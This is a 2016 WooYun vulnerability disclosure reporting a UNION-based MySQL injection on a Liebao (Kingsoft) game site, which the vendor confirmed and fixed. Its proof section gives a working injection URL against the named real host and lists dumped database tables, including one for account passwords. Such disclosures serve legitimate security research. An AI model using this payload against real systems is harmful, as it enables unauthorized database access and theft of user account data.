当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188825

漏洞标题:猎豹某站点MySQL注射(支持union)

相关厂商:金山毒霸

漏洞作者: lijiejie

提交时间:2016-03-25 09:03

修复时间:2016-05-09 10:05

公开时间:2016-05-09 10:05

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已经确认,细节仅向厂商公开
2016-04-04: 细节向核心白帽子及相关领域专家公开
2016-04-14: 细节向普通白帽子公开
2016-04-24: 细节向实习白帽子公开
2016-05-09: 细节向公众公开

简要描述:

猎豹某站点MySQL注射(支持union)

详细说明:

猎豹某站点MySQL注射(支持union)

漏洞证明:

http://wan.liebao.cn/action/wy/rank.php?sid=1&rktype=1 and 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x232323,user(),0x232323),NULL,NULL,NULL,NULL,NULL--&sid=1

liebiao.sqli.png


Database: cq_actor1
[59 tables]
+-------------------+
| accountpsw |
| actoralmirahitem |
| actorbagitem |
| actorbinarydata |
| actorbrother |
| actorconsignment |
| actordeath |
| actordeathdrop |
| actordepotitem |
| actordmkjitem |
| actorequipitem |
| actorfollowpet |
| actorfriends |
| actorgemitem |
| actorgodpet |
| actorguild |
| actorinvestment |
| actormagicitem |
| actormsg |
| actornewtitle |
| actoroffer |
| actorpetitem |
| actorpets |
| actorrelation |
| actorrune |
| actors |
| actorvariable |
| actorwarchariot |
| brothgrouplist |
| combatgame |
| combatrecord |
| diamond |
| dragonball |
| dragonsoul |
| filternames |
| friendchatmsg |
| friends |
| gameserveraddress |
| gamesetdata |
| gemsuit |
| godwealthevent |
| goingquest |
| guildevent |
| guildlist |
| guildskill |
| guildstore |
| guildstorerecord |
| guildwar |
| guildwarhistory |
| jobcount |
| mail |
| periodride |
| petskills |
| repeatquest |
| rideequipitem |
| skill |
| toprank |
| useritem |
| zycount |
+-------------------+

修复方案:

参数过滤,类型转换

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-25 10:05

厂商回复:

感谢提交,多谢关注金山安全,马上跟进处理

最新状态:

2016-03-25:感谢您的反馈,我们已经修复该漏洞


漏洞评价:

评价

  1. 2016-03-25 09:08 | missy ( 普通白帽子 | Rank:839 漏洞数:227 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

    好早

  2. 2016-03-25 09:17 | 雅柏菲卡 ( 普通白帽子 | Rank:1285 漏洞数:257 | 雙魚座聖鬥士雅柏菲卡)

    李姐姐 早上好

  3. 2016-03-25 10:34 | tangtanglove ( 路人 | Rank:20 漏洞数:7 | 一个对安全感兴趣的屌丝phper)

    李姐姐 早上好

  4. 2016-03-25 11:32 | 404notfound ( 普通白帽子 | Rank:417 漏洞数:115 | 考研中,有事请留言)

  5. 2016-03-25 14:33 | Rand0m ( 实习白帽子 | Rank:42 漏洞数:11 | 竟然还有人冒充我,醉了,骗子QQ:44569754...)

    李姐姐 早上好